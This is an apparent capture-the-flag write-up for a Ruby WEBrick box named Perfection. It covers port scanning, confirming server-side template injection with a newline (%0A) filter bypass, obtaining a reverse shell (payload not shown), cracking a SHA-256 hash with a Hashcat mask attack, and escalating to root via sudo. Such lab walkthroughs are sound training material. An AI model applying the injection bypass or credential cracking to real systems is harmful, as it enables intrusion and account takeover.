Week 9. Perfection
TL;DR
This in an Ubuntu 22.04 machine running a web site vulnerable to SSTI, which is exploited to get a shell in the system. Regarding escalation, there is a hash in the file system that, after cracking, allows us to get a password for a sudoer user.
KEYWORDS
Ruby, WEBrick 1.7.0, SSTI, Hashcat mask attack, sudo escalation.
REFERENCES
https://github.com/ruby/webrick
https://www.honeybadger.io/blog/ruby-template-performance-erb-haml-slim/
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#erb-ruby
ENUMERATION
Port scan.
> nmap $target -p- --min-rate=5000 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-02 15:20 EST
Nmap scan report for 10.10.11.253
Host is up, received user-set (0.088s latency).
Not shown: 62834 closed tcp ports (conn-refused), 2699 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
Nmap done: 1 IP address (1 host up) scanned in 16.00 secondsEnumerate the open ports.
Enumerate the web site with Firefox. It is a web tool to calculate weighted grades.
Enter any input to enumerate how the site works, just bear in mind weights must add up to 100. Capture with Burpsuite and inspect the response.
It seems the web site is made with WEBrick 1.7.0, which in turn relies on Ruby 3.0.2.
This is everything we need to know to begin exploitation.
USER
Investigating about WEBrick and Ruby I found these web sites:
https://github.com/ruby/webrick
https://www.honeybadger.io/blog/ruby-template-performance-erb-haml-slim
According to them, there are 3 Ruby templates: ERB, HAML and Slim, of which ERB seems to be the more common because is the one installed by default. Looking for Ruby ERB SSTI payloads I found these references:
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#erb-ruby
Let's start with the simplest payload which seems to be <%= 7*7 %>. If you enter it in the "Category" column field, a "Malicious input blocked" is reported, meaning an input filter must be in place.
Testing the application we find out it filters non-alphanumeric characters, and turns out the filter can be bypassed adding a %0A (newline) before the payload.
This time the application outputs value "49", so the SSTI vulnerability is confirmed. Start a listener and refer to HackTricks or PayloadsAllTheThings to prepare a reverse shell payload. Remember to URL-encode it before sending.
For example, this payload was confirmed to be working.
A reverse shell for user susan is received on port 1919.
Which can be used to retrieve the user flag.
ROOT
Start from the low-priv reverse shell for user susan. Bearing in mind this is an "easy" box, we assume linpeas.sh will surely help to automatically discover a flaw.
Run it and inspect the results.
Some interesting facts are revealed. First, cron jobs and Ruby scripts are found in Susan's home.
Next, it seems Susan is a sudoer.
Also, a cloud credentials file is found in her home directory.
And finally, the tool reveals Susan has received emails.
We could try to exploit the fact susan is a sudoer, but for this we would need to know her clear text password. Let's look for the password in the credentials file.
There is a hash for Susan Miller which looks like SHA-256.
Next step is to enumerate Susan's email.
So we have found the password creation pattern. since we also have the password hash, we are in a position to launch a Hashcat mask attack.
This returns Susan's password, which we can use to connect to the host via SSH.
From the SSH shell, take the opportunity to enumerate the system.
Now that we have Susan's password we can enumerate her sudo configuration.
Nice, just proceed to spawn a root shell.
You are root.
Last updated